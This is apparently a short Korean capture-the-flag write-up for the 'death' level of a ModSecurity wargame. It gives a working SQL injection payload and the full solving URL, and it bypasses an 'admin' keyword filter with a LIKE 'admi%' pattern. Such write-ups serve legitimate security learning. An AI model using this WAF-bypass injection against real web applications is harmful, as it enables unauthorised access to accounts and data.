death

첫 화면이다.

prob_cthulhu와 같이 id에 '<@ or 1 or ' 를 넣으면 아래와 같은 결과가 나온다.

https://modsec.rubiya.kr/chall/death_0128e8a86066ca4f148444f0e99f4707.php?id=%27%3C@%20or%20id%20like%20%27admi%%27%20or%20%27 에 접속하면 문제가 풀린다.

id에 '<@ or id like 'admi%' or ' 을 넣은 셈이다.

admin 이 필터링되기 때문에 이를 우회하기 위해 id like 'admi%' 을 사용하였다.

PreviouscthulhuNextgodzilla

Last updated

Was this helpful?